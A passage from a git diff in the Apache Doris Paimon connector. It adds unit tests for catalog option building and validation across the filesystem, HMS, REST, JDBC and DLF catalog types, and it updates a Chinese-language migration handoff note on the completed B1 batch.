dlfSetsHiveMetastoreClientClassAndPoolKeys() { + Options opts = PaimonCatalogFactory.buildCatalogOptions(props( + "paimon.catalog.type", "dlf", + "warehouse", "/wh", + "dlf.access_key", "ak", + "dlf.secret_key", "sk", + "dlf.endpoint", "dlf.cn.aliyuncs.com")); + + // WHY: dlf is adapted onto paimon's "hive" metastore via the Aliyun ProxyMetaStoreClient; + // the legacy DLF flavor always emits that client class plus the conf:dlf.catalog.id pool + // key. These two are what make a HiveCatalog talk to DLF. MUTATION: metastore!="hive", + // wrong client class, or missing pool key -> red. + Assertions.assertEquals("hive", opts.get("metastore")); + Assertions.assertEquals("com.aliyun.datalake.metastore.hive2.ProxyMetaStoreClient", + opts.get("metastore.client.class")); + Assertions.assertEquals("conf:dlf.catalog.id", opts.get("client-pool-cache.keys")); + } + + @Test + public void paimonPrefixPassthroughExcludesStoragePrefixes() { + Options opts = PaimonCatalogFactory.buildCatalogOptions(props( + "paimon.catalog.type", "filesystem", + "warehouse", "/wh", + "paimon.read.batch-size", "4096", + "paimon.s3.access-key", "should-not-leak")); + + // WHY: the legacy appendCatalogOptions re-keys generic paimon.* props by stripping the + // prefix, BUT deliberately excludes storage prefixes (paimon.s3./s3a./fs.s3./fs.oss.) + // because those belong in the Hadoop Configuration (B1 dispatch 2), not the catalog + // Options. MUTATION: dropping the passthrough (read.batch-size missing) or leaking the + // storage key (s3.access-key present) -> red. + Assertions.assertEquals("4096", opts.get("read.batch-size")); + Assertions.assertNull(opts.get("access-key"), + "storage-prefixed paimon.s3.* keys must NOT be promoted into catalog options"); + } + + @Test + public void restBuildOptionsOmitsBlankWarehouse() { + Options opts = PaimonCatalogFactory.buildCatalogOptions(props( + "paimon.catalog.type", "rest", + "paimon.rest.uri", "http://rest:8080")); + + // WHY: this pins option ASSEMBLY only (independent of validate, which now requires a + // warehouse for rest too): the common appender sets the warehouse option only when the + // warehouse value is non-blank, so a blank/absent warehouse produces no warehouse key + // rather than a blank one. MUTATION: emitting a (blank) warehouse key when none was given, + // or unconditionally setting warehouse -> red. + Assertions.assertNull(opts.get("warehouse"), + "buildCatalogOptions must not emit a warehouse option when the warehouse is blank"); + } + + // --------------------------------------------------------------------- + // validate — fail-fast + // --------------------------------------------------------------------- + + @Test + public void validateRejectsUnknownFlavor() { + // WHY: an unknown paimon.catalog.type must fail at CREATE CATALOG, not silently fall back + // to filesystem (the pre-B1 stub bug). MUTATION: removing the flavor whitelist check -> red. + IllegalArgumentException ex = Assertions.assertThrows(IllegalArgumentException.class, + () -> PaimonCatalogFactory.validate(props("paimon.catalog.type", "bogus", "warehouse", "/wh"))); + Assertions.assertTrue(ex.getMessage().contains("bogus")); + } + + @Test + public void validateRequiresWarehouseForFilesystem() { + // WHY: filesystem/hms/jdbc/dlf all need a warehouse; missing it must fail fast. + // MUTATION: dropping the warehouse-required check for filesystem -> red. + Assertions.assertThrows(IllegalArgumentException.class, + () -> PaimonCatalogFactory.validate(props("paimon.catalog.type", "filesystem"))); + } + + @Test + public void validateRequiresWarehouseForRest() { + // WHY (legacy parity): the base AbstractPaimonProperties declares warehouse as a required + // @ConnectorProperty and PaimonRestMetaStoreProperties does NOT override it, so legacy + // REJECTS a REST catalog without warehouse. validate must require warehouse for rest too, + // not exempt it. MUTATION: re-adding a REST exemption to the warehouse-required check + // (rest-without-warehouse passing) -> red. + Assertions.assertThrows(IllegalArgumentException.class, + () -> PaimonCatalogFactory.validate(props( + "paimon.catalog.type", "rest", + "paimon.rest.uri", "http://rest:8080"))); + } + + @Test + public void validateRestDlfTokenProviderRequiresAkSk() { + // WHY: legacy ParamRules.requireIf — when the REST token provider is "dlf", the dlf + // access-key-id AND access-key-secret are mandatory. MUTATION: removing the requireIf -> red. + // NOTE: warehouse is supplied so the throw exercises the Ak/Sk requireIf, not the + // warehouse-required check. + Assertions.assertThrows(IllegalArgumentException.class, + () -> PaimonCatalogFactory.validate(props( + "paimon.catalog.type", "rest", + "warehouse", "/wh", + "paimon.rest.uri", "http://rest:8080", + "paimon.rest.token.provider", "dlf"))); + } + + @Test + public void validateJdbcDriverUrlWithoutDriverClassFails() { + // WHY: legacy getBackendPaimonOptions/registerJdbcDriver require driver_class whenever a + // driver_url is given (otherwise the driver cannot be loaded). MUTATION: removing that + // coupling check -> red. + Assertions.assertThrows(IllegalArgumentException.class, + () -> PaimonCatalogFactory.validate(props( + "paimon.catalog.type", "jdbc", + "warehouse", "/wh", + "uri", "jdbc:mysql://db:3306/meta", + "paimon.jdbc.driver_url", "mysql.jar"))); + } + + @Test + public void validateDlfRequiresAccessKey() { + // WHY: legacy AliyunDLFBaseProperties.buildRules requires dlf.access_key (and secret_key). + // MUTATION: removing the access-key required check -> red. + Assertions.assertThrows(IllegalArgumentException.class, + () -> PaimonCatalogFactory.validate(props( + "paimon.catalog.type", "dlf", + "warehouse", "/wh", + "dlf.secret_key", "sk", + "dlf.endpoint", "dlf.cn.aliyuncs.com"))); + } + + @Test + public void validateDlfRequiresEndpointOrRegion() { + // WHY: legacy DLF derives the endpoint from the region; if BOTH endpoint and region are + // blank it throws "dlf.endpoint is required." MUTATION: removing the endpoint-or-region + // check -> red. + IllegalArgumentException ex = Assertions.assertThrows(IllegalArgumentException.class, + () -> PaimonCatalogFactory.validate(props( + "paimon.catalog.type", "dlf", + "warehouse", "/wh", + "dlf.access_key", "ak", + "dlf.secret_key", "sk"))); + Assertions.assertTrue(ex.getMessage().contains("dlf.endpoint")); + } + + @Test + public void validateHmsRequiresUri() { + // WHY: the hms flavor cannot connect without a metastore uri; legacy HMSBaseProperties + // requires hive.metastore.uris (or the uri alias). MUTATION: removing the hms uri check -> red. + Assertions.assertThrows(IllegalArgumentException.class, + () -> PaimonCatalogFactory.validate(props( + "paimon.catalog.type", "hms", + "warehouse", "/wh"))); + } + + @Test + public void validateAcceptsEachWellFormedFlavor() { + // WHY: the happy path for every flavor must pass cleanly — a validator that rejects valid + // configs is as broken as one that accepts invalid ones. MUTATION: an over-eager required + // check on any flavor -> red. + Assertions.assertDoesNotThrow(() -> PaimonCatalogFactory.validate( + props("paimon.catalog.type", "filesystem", "warehouse", "/wh"))); + Assertions.assertDoesNotThrow(() -> PaimonCatalogFactory.validate(props( + "paimon.catalog.type", "hms", "warehouse", "/wh", "hive.metastore.uris", "thrift://nn:9083"))); + Assertions.assertDoesNotThrow(() -> PaimonCatalogFactory.validate(props( + "paimon.catalog.type", "rest", "warehouse", "/wh", "paimon.rest.uri", "http://rest:8080"))); + Assertions.assertDoesNotThrow(() -> PaimonCatalogFactory.validate(props( + "paimon.catalog.type", "jdbc", "warehouse", "/wh", "uri", "jdbc:mysql://db:3306/meta"))); + Assertions.assertDoesNotThrow(() -> PaimonCatalogFactory.validate(props( + "paimon.catalog.type", "dlf", "warehouse", "/wh", + "dlf.access_key", "ak", "dlf.secret_key", "sk", "dlf.region", "cn-hangzhou"))); + } + + @Test + public void validateDefaultsToFilesystemWhenTypeAbsent() { + // WHY: an absent paimon.catalog.type defaults to filesystem (DEFAULT_CATALOG_TYPE), which + // then requires a warehouse. MUTATION: defaulting to something else, or not requiring + // warehouse on the implicit-filesystem path -> red. + Assertions.assertDoesNotThrow(() -> PaimonCatalogFactory.validate(props("warehouse", "/wh"))); + Assertions.assertThrows(IllegalArgumentException.class, + () -> PaimonCatalogFactory.validate(props("not-a-type", "x"))); + } + + // --------------------------------------------------------------------- + // buildHadoopConfiguration — S3 prefix normalization + raw fs./dfs. passthrough + // --------------------------------------------------------------------- + + @Test + public void buildHadoopConfigurationNormalizesS3PrefixesAndCopiesRawKeys() { + Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( + "paimon.s3.access-key", "ak", + "paimon.s3a.secret-key", "sk", + "paimon.fs.s3.endpoint", "s3.amazonaws.com", + "paimon.fs.oss.endpoint.region", "oss-cn.aliyuncs.com", + "fs.defaultFS", "hdfs://nn:8020", + "dfs.nameservices", "nn", + "hadoop.security.authentication", "kerberos", + "paimon.read.batch-size", "4096")); + + // WHY: the live FileIO/S3FileIO only recognizes Hadoop-prefixed keys; the legacy + // normalizeS3Config strips each of the four user storage prefixes and re-keys them under + // fs.s3a., while genuine fs.*/dfs./hadoop.* keys are passed through verbatim so HDFS/auth + // config reaches the catalog. MUTATION: not normalizing to fs.s3a. (key still under the old + // prefix), or dropping the raw fs./dfs./hadoop. passthrough -> red. + Assertions.assertEquals("ak", conf.get("fs.s3a.access-key")); + Assertions.assertEquals("sk", conf.get("fs.s3a.secret-key")); + Assertions.assertEquals("s3.amazonaws.com", conf.get("fs.s3a.endpoint")); + // paimon.fs.oss.* also normalizes onto the fs.s3a. prefix (legacy behavior: all four + // userStoragePrefixes map to FS_S3A_PREFIX). Distinct suffix to avoid colliding with the + // paimon.fs.s3.endpoint above (HashMap iteration order is not guaranteed). + Assertions.assertEquals("oss-cn.aliyuncs.com", conf.get("fs.s3a.endpoint.region")); + Assertions.assertEquals("hdfs://nn:8020", conf.get("fs.defaultFS")); + Assertions.assertEquals("nn", conf.get("dfs.nameservices")); + Assertions.assertEquals("kerberos", conf.get("hadoop.security.authentication")); + // A non-storage paimon.* key (a catalog Option) must NOT leak into the Hadoop Configuration. + Assertions.assertNull(conf.get("paimon.read.batch-size")); + Assertions.assertNull(conf.get("read.batch-size")); + } + + // --------------------------------------------------------------------- + // buildHmsHiveConf — metastore uri + hive.* verbatim + auth key + storage overlay + // --------------------------------------------------------------------- + + @Test + public void buildHmsHiveConfSetsUriHiveKeysAuthAndStorage() { + HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( + "uri", "thrift://nn:9083", + "hive.metastore.sasl.enabled", "true", + "hive.metastore.client.principal", "doris@REALM", + "hive.metastore.client.keytab", "/etc/doris.keytab", + "hadoop.security.authentication", "kerberos", + "paimon.s3.access-key", "ak")); + + // WHY: a live HiveCatalog reads the metastore uri from the HiveConf, honors any user hive.* + // override, and needs the auth keys (alongside the FE-injected UGI) plus the storage config + // to reach the warehouse. The "uri" alias must resolve to hive.metastore.uris. MUTATION: + // missing metastore uri, dropping a hive.* override, dropping an auth key, or not overlaying + // the normalized storage config -> red. + Assertions.assertEquals("thrift://nn:9083", hc.get("hive.metastore.uris")); + Assertions.assertEquals("true", hc.get("hive.metastore.sasl.enabled")); + Assertions.assertEquals("doris@REALM", hc.get("hive.metastore.client.principal")); + Assertions.assertEquals("/etc/doris.keytab", hc.get("hive.metastore.client.keytab")); + Assertions.assertEquals("kerberos", hc.get("hadoop.security.authentication")); + Assertions.assertEquals("ak", hc.get("fs.s3a.access-key")); + } + + @Test + public void buildHmsHiveConfKerberosSetsSaslServicePrincipalAndAuthToLocal() { + HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( + "uri", "thrift://nn:9083", + "hive.metastore.authentication.type", "kerberos", + "hive.metastore.client.principal", "doris@REALM", + "hive.metastore.client.keytab", "/etc/doris.keytab", + "hive.metastore.service.principal", "hive/_HOST@REALM", + "hadoop.security.auth_to_local", "RULE:[1:$1@$0](.*@REALM)s/@.*//")); + + // WHY (I-2 parity gap): legacy HMSBaseProperties.initHadoopAuthenticator, when the metastore + // auth type is kerberos, sets hive.metastore.sasl.enabled=true + + // hadoop.security.authentication=kerberos (lines 160-167), promotes the SERVICE principal to + // hive.metastore.kerberos.principal (sourced from hive.metastore.service.principal, lines + // 153-155), and carries hadoop.security.auth_to_local (lines 156-159). Without SASL + the + // service principal a live HiveMetaStoreClient cannot complete the GSSAPI handshake against a + // kerberized HMS. MUTATION: dropping sasl.enabled, the service principal, auth_to_local, or + // not forcing hadoop.security.authentication=kerberos -> red. + Assertions.assertEquals("true", hc.get("hive.metastore.sasl.enabled")); + Assertions.assertEquals("kerberos", hc.get("hadoop.security.authentication")); + Assertions.assertEquals("hive/_HOST@REALM", hc.get("hive.metastore.kerberos.principal")); + Assertions.assertEquals("RULE:[1:$1@$0](.*@REALM)s/@.*//", hc.get("hadoop.security.auth_to_local")); + } + + @Test + public void buildHmsHiveConfKerberosAcceptsServicePrincipalAlias() { + HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( + "uri", "thrift://nn:9083", + "hive.metastore.authentication.type", "kerberos", + "hive.metastore.client.principal", "doris@REALM", + "hive.metastore.client.keytab", "/etc/doris.keytab", + // alias: legacy @ConnectorProperty(names={"hive.metastore.service.principal", + // "hive.metastore.kerberos.principal"}) — the bare kerberos.principal key is the + // service-principal alias when service.principal is absent. + "hive.metastore.kerberos.principal", "hive/_HOST@REALM")); + + // WHY (I-2 alias parity): the service principal can arrive under either alias; the + // hive.* verbatim copy already lands hive.metastore.kerberos.principal, but the alias + // resolution must still treat it as the service principal source (and not get clobbered by a + // blank service.principal). MUTATION: not reading the kerberos.principal alias as the service + // principal -> red. + Assertions.assertEquals("hive/_HOST@REALM", hc.get("hive.metastore.kerberos.principal")); + Assertions.assertEquals("true", hc.get("hive.metastore.sasl.enabled")); + } + + @Test + public void buildHmsHiveConfSimpleDoesNotEnableSasl() { + HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( + "uri", "thrift://nn:9083", + "hive.metastore.authentication.type", "simple")); + + // WHY (I-2 negative parity): legacy only enables SASL on the kerberos branch; a simple + // (non-kerberized) HMS must NOT advertise sasl.enabled=true or it would attempt a GSSAPI + // handshake against a plaintext metastore and fail. (HiveConf carries a baked-in default of + // "false", so the invariant is "not true", not "absent" — legacy likewise never sets it to + // true on the simple path.) MUTATION: unconditionally setting sasl.enabled=true regardless of + // auth type -> red. + Assertions.assertNotEquals("true", hc.get("hive.metastore.sasl.enabled"), + "simple-auth HMS must not enable metastore SASL"); + } + + @Test + public void buildHmsHiveConfSetsClientSocketTimeoutDefault() { + HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props("uri", "thrift://nn:9083")); + + // WHY (I-2): legacy checkAndInit defaults the metastore client socket timeout to + // Config.hive_metastore_client_timeout_second (=10) when the user has not overridden it + // (lines 204-208), so a hung metastore does not block CREATE CATALOG forever. MUTATION: + // dropping the default timeout -> red. + Assertions.assertEquals("10", hc.get("hive.metastore.client.socket.timeout")); + } + + // --------------------------------------------------------------------- + // requireOssStorageForDlf — OSS-only gate (legacy OSS||OSS_HDFS, NOT generic S3) + // --------------------------------------------------------------------- + + @Test + public void requireOssStorageForDlfRejectsS3OnlyConfig() { + // WHY (I-1 parity): legacy PaimonAliyunDLFMetaStoreProperties.initializeCatalog required a + // StorageProperties of Type.OSS || OSS_HDFS specifically — a generic S3 backend is NOT + // accepted. A DLF catalog configured with only s3.* keys (no oss) must be rejected as + // misconfigured, with the exact legacy message. MUTATION: loosening the gate to also accept + // s3 prefixes (so an s3-only DLF catalog passes) -> red. + IllegalStateException ex = Assertions.assertThrows(IllegalStateException.class, + () -> PaimonCatalogFactory.requireOssStorageForDlf(props( + "s3.access-key", "ak", + "fs.s3a.endpoint", "s3.amazonaws.com", + "paimon.s3.secret-key", "sk"))); + Assertions.assertEquals("Paimon DLF metastore requires OSS storage properties.", ex.getMessage()); + } + + @Test + public void requireOssStorageForDlfAcceptsOssConfig() { + // WHY (I-1 parity): an OSS-backed DLF catalog is the supported case; the gate must pass when + // any oss./fs.oss./paimon.fs.oss. key is present. MUTATION: a gate that rejects a valid + // OSS-backed DLF catalog -> red. + Assertions.assertDoesNotThrow(() -> PaimonCatalogFactory.requireOssStorageForDlf(props( + "oss.endpoint", "oss-cn-hangzhou.aliyuncs.com"))); + Assertions.assertDoesNotThrow(() -> PaimonCatalogFactory.requireOssStorageForDlf(props( + "fs.oss.endpoint", "oss-cn-hangzhou.aliyuncs.com"))); + Assertions.assertDoesNotThrow(() -> PaimonCatalogFactory.requireOssStorageForDlf(props( + "paimon.fs.oss.access-key", "oss-ak"))); + } + + // --------------------------------------------------------------------- + // buildDlfHiveConf — 8 dlf.catalog.* keys + endpoint-from-region + uid fallback + throw + // --------------------------------------------------------------------- + + @Test + public void buildDlfHiveConfSetsAllEightDlfKeysAndOverlaysStorage() { + HiveConf hc = PaimonCatalogFactory.buildDlfHiveConf(props( + "dlf.access_key", "ak", + "dlf.secret_key", "sk", + "dlf.session_token", "tok", + "dlf.region", "cn-hangzhou", + "dlf.endpoint", "dlf.cn-hangzhou.aliyuncs.com", + "dlf.catalog.uid", "uid-1", + "dlf.catalog.id", "cat-1", + "dlf.catalog.proxyMode", "DLF_ONLY", + "paimon.fs.oss.access-key", "oss-ak")); + + // WHY: DLF is adapted onto a HiveCatalog via the ProxyMetaStoreClient, which reads the eight + // DataLakeConfig.CATALOG_* keys from the HiveConf; all eight must be present with the + // verified literal key names, plus the OSS storage overlay. MUTATION: a wrong/missing + // dlf.catalog.* key name, or not overlaying the storage config -> red. + Assertions.assertEquals("ak", hc.get("dlf.catalog.accessKeyId")); + Assertions.assertEquals("sk", hc.get("dlf.catalog.accessKeySecret")); + Assertions.assertEquals("tok", hc.get("dlf.catalog.securityToken")); + Assertions.assertEquals("cn-hangzhou", hc.get("dlf.catalog.region")); + Assertions.assertEquals("dlf.cn-hangzhou.aliyuncs.com", hc.get("dlf.catalog.endpoint")); + Assertions.assertEquals("uid-1", hc.get("dlf.catalog.uid")); + Assertions.assertEquals("cat-1", hc.get("dlf.catalog.id")); + Assertions.assertEquals("DLF_ONLY", hc.get("dlf.catalog.proxyMode")); + Assertions.assertEquals("oss-ak", hc.get("fs.s3a.access-key")); + } + + @Test + public void buildDlfHiveConfDerivesVpcEndpointFromRegionByDefault() { + HiveConf hc = PaimonCatalogFactory.buildDlfHiveConf(props( + "dlf.access_key", "ak", + "dlf.secret_key", "sk", + "dlf.region", "cn-beijing", + "dlf.catalog.uid", "uid-1")); + + // WHY: legacy checkAndInit derives the endpoint from the region when the endpoint is blank; + // the DEFAULT (accessPublic=false) is the VPC endpoint. MUTATION: deriving the public + // endpoint by default, or not deriving at all -> red. + Assertions.assertEquals("dlf-vpc.cn-beijing.aliyuncs.com", hc.get("dlf.catalog.endpoint")); + } + + @Test + public void buildDlfHiveConfDerivesPublicEndpointWhenAccessPublic() { + HiveConf hc = PaimonCatalogFactory.buildDlfHiveConf(props( + "dlf.access_key", "ak", + "dlf.secret_key", "sk", + "dlf.region", "cn-beijing", + "dlf.access.public", "true", + "dlf.catalog.uid", "uid-1")); + + // WHY: when dlf.access.public is truthy the public endpoint (dlf....) is used instead + // of the VPC one. MUTATION: ignoring accessPublic (still deriving the vpc endpoint) -> red. + Assertions.assertEquals("dlf.cn-beijing.aliyuncs.com", hc.get("dlf.catalog.endpoint")); + } + + @Test + public void buildDlfHiveConfFallsBackCatalogIdToUid() { + HiveConf hc = PaimonCatalogFactory.buildDlfHiveConf(props( + "dlf.access_key", "ak", + "dlf.secret_key", "sk", + "dlf.endpoint", "dlf.cn-hangzhou.aliyuncs.com", + "dlf.catalog.uid", "uid-42")); + + // WHY: legacy checkAndInit defaults the catalog id to the uid when no explicit catalog id is + // given (the DLF account's default catalog is keyed by uid). MUTATION: leaving the catalog + // id blank instead of falling back to uid -> red. + Assertions.assertEquals("uid-42", hc.get("dlf.catalog.id")); + } + + @Test + public void buildDlfHiveConfThrowsWhenEndpointAndRegionBlank() { + // WHY: legacy checkAndInit throws "dlf.endpoint is required." when neither an endpoint nor a + // region (to derive one) is given — the DLF client cannot connect without it. MUTATION: + // removing the throw (returning a HiveConf with a blank endpoint) -> red. + IllegalStateException ex = Assertions.assertThrows(IllegalStateException.class, + () -> PaimonCatalogFactory.buildDlfHiveConf(props( + "dlf.access_key", "ak", + "dlf.secret_key", "sk", + "dlf.catalog.uid", "uid-1"))); + Assertions.assertTrue(ex.getMessage().contains("dlf.endpoint")); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonLiveConnectivityTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonLiveConnectivityTest.java index 0227193c40b4b7..3b2d1812744a0c 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonLiveConnectivityTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonLiveConnectivityTest.java @@ -18,11 +18,13 @@ package org.apache.doris.connector.paimon; import org.apache.doris.connector.api.ConnectorMetadata; +import org.apache.doris.connector.spi.ConnectorContext; import org.junit.jupiter.api.Assertions; import org.junit.jupiter.api.Assumptions; import org.junit.jupiter.api.Test; +import java.util.Collections; import java.util.HashMap; import java.util.Map; @@ -41,6 +43,26 @@ */ public class PaimonLiveConnectivityTest { + /** Minimal context: simple auth (default executeAuthenticated) and an empty environment. */ + private static ConnectorContext testContext() { + return new ConnectorContext() { + @Override + public String getCatalogName() { + return "paimon_live"; + } + + @Override + public long getCatalogId() { + return 1L; + } + + @Override + public Map getEnvironment() { + return Collections.emptyMap(); + } + }; + } + @Test public void liveMetadataRoundTrip() { String warehouse = System.getenv("PAIMON_WAREHOUSE"); @@ -58,7 +80,7 @@ public void liveMetadataRoundTrip() { // Exercise the full production path: PaimonConnector lazily builds a real Catalog and // wires the CatalogBackedPaimonCatalogOps seam into the metadata. One listDatabaseNames // round-trip confirms the catalog is reachable end to end. - try (PaimonConnector connector = new PaimonConnector(props)) { + try (PaimonConnector connector = new PaimonConnector(props, testContext())) { ConnectorMetadata metadata = connector.getMetadata(null); Assertions.assertNotNull(metadata.listDatabaseNames(null), "a reachable Paimon catalog must return a (possibly empty) database list"); diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index cffb3366c8ae3c..b7a41005e40744 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -5,46 +5,52 @@ --- -# 🔥 2026-06-09 — P5 paimon B0 完成(测试基建 + parity baseline);下一步 = B1(flavor 装配) +# 🔥 2026-06-09 — P5 paimon B1 完成(flavor 装配,全 5 flavor,单 Catalog);下一步 = B2(normal-read) -> **本 session**:按 [tasks/P5-paimon-migration.md](./tasks/P5-paimon-migration.md) 落地 **B0**(T01 测试基建 + T02 parity baseline)。subagent-driven(每任务 implement→spec-review→quality-review + 主线 firsthand 复跑构建)。**B0 是 P5 首个产线代码批次**;B1–B9 待续。 +> **本 session**:按 [tasks/P5-paimon-migration.md](./tasks/P5-paimon-migration.md) 落地 **B1**(T03 flavor 装配 + T04 属性键 + T05 validateProperties)。**用户签字 all-5-flavors now**(非分阶段)。subagent-driven(内部 2-dispatch,每 dispatch implement→spec-review→quality-review→fix-loop→re-review + final holistic review + 主线 firsthand 复跑)。 -## ✅ 本 session 已完成(B0 = T01 + T02) +## ✅ 本 session 已完成(B1 = T03 + T04 + T05) -- **T01(测试基建 + seam)**:抽 `PaimonCatalogOps` 注入式 seam(**5 读方法**:listDatabases/getDatabase/listTables/getTable/close,B0 只读)over 远端 paimon `Catalog`;`PaimonConnectorMetadata` **6 调用点齐迁**(读路径字节级不变,`Catalog` import 仅留两 NotExist catch);`PaimonConnector` 装配 `CatalogBackedPaimonCatalogOps`。建 `fe-connector-paimon` **首个测试模块**(MC `McStructureHelper` 范式,no-mockito):`RecordingPaimonCatalogOps` + `PaimonConnectorMetadataTest`(9 UT,钉 `databaseExists` try/catch→bool + `getColumnHandles` reload-fallback,各带 WHY+MUTATION 注释)+ `FakePaimonTable`(28 非读方法 fail-loud)+ env-gated `PaimonLiveConnectivityTest`。 -- **T02(parity baseline)**:① **R-007 版本三方已对齐**(`${paimon.version}=1.3.1` 单源 `fe/pom.xml:399`;FE 连接器 + BE paimon-scanner + preload-extensions 同源)→ 落不变式注释(**非改版本/非加 enforcer**)。② offline FE→BE serde round-trip smoke `PaimonTableSerdeRoundTripTest`:真 `FileSystemCatalog`/`LocalFileIO`@TempDir → 真 `FileStoreTable` → 连接器 encode(InstantiationUtil+STD Base64,镜像 `PaimonScanPlanProvider.encodeObjectToString`)→ BE-side decode(镜像 `PaimonUtils.deserialize` **URL-first/STD-fallback**)→ 断 rowType/partition/primary keys;CI 跑、**非** env-gated。③ parity-baseline doc [`research/p5-paimon-parity-baseline.md`](./research/p5-paimon-parity-baseline.md)。 -- **验证(主线 firsthand)**:连接器 `Tests run: 12, Failures: 0, Errors: 0, Skipped: 1`(1 skip=live)+ **BUILD SUCCESS** + checkstyle 0 + import-gate 净。每任务 spec+quality 双审 PASS;主线追加 3 处准确性修正后复绿(见下「准确性修正」)。 -- **doc 同步**:`tasks/P5-paimon-migration.md`(T01→✅、T02→✅、元信息→进行中、阶段日志 +B0 条、当前阻塞项更新)、`fe/pom.xml`(R-007 注释)、本 HANDOFF(覆盖)。 +- **新 `PaimonCatalogFactory`**(连接器侧,镜像 MC `MCConnectorClientFactory` 角色):纯 `validate(props)`(flavor 合法性 + 每-flavor 必需键 fail-fast)+ 纯 `buildCatalogOptions(props)`(`paimon.catalog.type`→paimon `metastore` opt[filesystem/hive/rest/jdbc] + warehouse + 每-flavor opts + `paimon.*` 透传排除 4 storage 前缀)+ 纯 `buildHadoopConfiguration`/`buildHmsHiveConf`/`buildDlfHiveConf` + `requireOssStorageForDlf`。**纯=可离线 UT**(31 个 PaimonCatalogFactoryTest,WHY+MUTATION)。 +- **`PaimonConnector`**:线程 `ConnectorContext`(之前 provider.create 丢弃了 context);`createCatalog` 全 5 flavor 活线——filesystem/jdbc=`CatalogContext.create(options, conf)`、rest=Options-only、hms/dlf=HiveConf;**全部 `context.executeAuthenticated(...)` 包裹**(authenticator seam,FE 注入 Kerberos UGI,默认 no-op);JDBC DriverShim 移植,driver_url 经 `context.getEnvironment()` 解析(替禁用的 `JdbcResource`)。 +- **`PaimonConnectorProperties`**:全 flavor key 常量(HMS/REST/JDBC/DLF,多别名 `String[]`)。**`PaimonConnectorProvider`**:`create` 传 context + override `validateProperties`→`PaimonCatalogFactory.validate`。 +- **pom**:加 `paimon-hive-connector-3.1`+`hadoop-common`+`hive-common`(compile,managed 版);**弃 hive-catalog-shade** 避 fastutil 冲突。 +- **验证(主线 firsthand)**:`Tests run: 43, Failures: 0, Errors: 0, Skipped: 1`(1 skip=live)+ BUILD SUCCESS + checkstyle 0 + import-gate 0。spec+quality 双审/dispatch + final holistic review=READY。 -## 🧠 核心发现 / 纠偏(影响后续批次) +## 🧠 核心发现 / 纠偏(影响后续批次 + 翻闸) -1. **R-007 三方版本已对齐**(非待修):单 `${paimon.version}=1.3.1` 属性即真源;删 legacy 后(B8)仍须验 paimon-core FE classpath 恰一份。 -2. **parity baseline 早已存在**(证伪 recon「无 baseline」):**41 套**回归(33 p0 + 6 p2 flavor + 3 MTMV + fe-core `PaimonScanNodeTest`)今跑 legacy `PaimonScanNode`,**翻闸(B7)后同套自动变 connector-SPI after 门**——无须新写「after」套。真 gap = 连接器侧 UT(① `PaimonPredicateConverter` 无连接器测,legacy 侧已有 fe-core `PaimonPredicateConverterTest`;② native/deletion-vector 连接器分类断言;③ sys-table forced-JNI 断言)+ **live-e2e 硬门**(用户跑,CI 跳,flavor 套全 env-gated)。详见 parity doc §3。 -3. **seam B0 只读**:`PaimonCatalogOps` 故意不含 DDL;**B1–B3 须扩** createDb/dropDb/createTable/dropTable 并**同步** `CatalogBackedPaimonCatalogOps` + 测试 `RecordingPaimonCatalogOps`。 -4. **transient-Table reload BLOCKER 仍在**(T06/B2):`PaimonScanPlanProvider:95` 取 `getPaimonTable()` 无 null fallback、无 catalog 访问;序列化后 NPE。B2 须修(metadata 侧 `getColumnHandles` 已有 fallback 可参照)。 +1. **2 个新 blocker(非 plan 预见)已解**:① JDBC 用 `org.apache.doris.catalog.JdbcResource`(禁 import)→ 改 `ConnectorContext.getEnvironment()`(`jdbc_drivers_dir`/`doris_home`);② storage `Configuration` 由 fe-core `StorageProperties`(禁)构建 → 连接器 minimal 重建(`fs.*`/`dfs.*`/`hadoop.*` + `paimon.s3.*`→`fs.s3a.` normalize)。 +2. **reachability 真相**(firsthand):paimon-core 1.3.1 只含 filesystem/jdbc/rest catalog;hms+dlf 都 → paimon `metastore=hive`(dlf=HMS+Aliyun ProxyMetaStoreClient+DataLakeConfig)须 `paimon-hive-connector-3.1`。DLF key 全 inline 字面量(`dlf.catalog.*`,javap 证)避 Aliyun 编译依赖。 +3. **纠偏:rest 同样必需 warehouse**(recon「rest Options-only 无 warehouse」证伪)——legacy base warehouse `@ConnectorProperty` required 默认 true 且 rest 未 override。已改齐 parity。 +4. **authenticator 简化**:legacy 每-flavor 条件 `HadoopExecutionAuthenticator`;连接器统一 `executeAuthenticated` 包裹全 flavor(FE 无 Kerberos 时注入 no-op,等价且更简)。 -## 🛠 准确性修正(主线在 quality-review PASS 后追加,已复绿) +## ⚠️ 翻闸(B7)硬门新增(B1 落地,live-e2e 必验,pre-cutover 离线不可测) -- `PaimonTableSerdeRoundTripTest.beDecode`:改为**真镜像 BE** `PaimonUtils.deserialize`(先 `getUrlDecoder` 再 STD fallback + scanner classloader),并修 javadoc 过度声明。 -- 第二测试 `base64VariantMustMatchBetweenEncodeAndDecode` → 重命名 `standardBase64LegRoundTripsSerializedBytesVerbatim`;修「corrupts」措辞为「throws→触发 BE STD fallback」。 -- parity doc §3.1:注明 legacy 转换器**已有**直接 fe-core UT(`PaimonPredicateConverterTest`),gap 精确化为「**连接器** converter 无测」。 +> 详见 plan-doc「风险/开放问题」R-高/R-中 翻闸门条 + 阶段日志 B1 条 + 代码内 NOTE。**用户真实 paimon 各 flavor 环境必验。** -## 🎯 下一 session = B1(flavor 装配,单 Catalog 模型;gated on D1=A 已签) +1. **hms/dlf Thrift metastore client 跨 classloader**:连接器**不打包** `IMetaStoreClient`/`HiveMetaStoreClient`(paimon-hive-connector 的 hive-exec/metastore=test scope);翻闸时由 FE host `hive-catalog-shade`(3.1.x) 提供。plugin child-first 下 host(3.1.x) 与 plugin bundled(hadoop 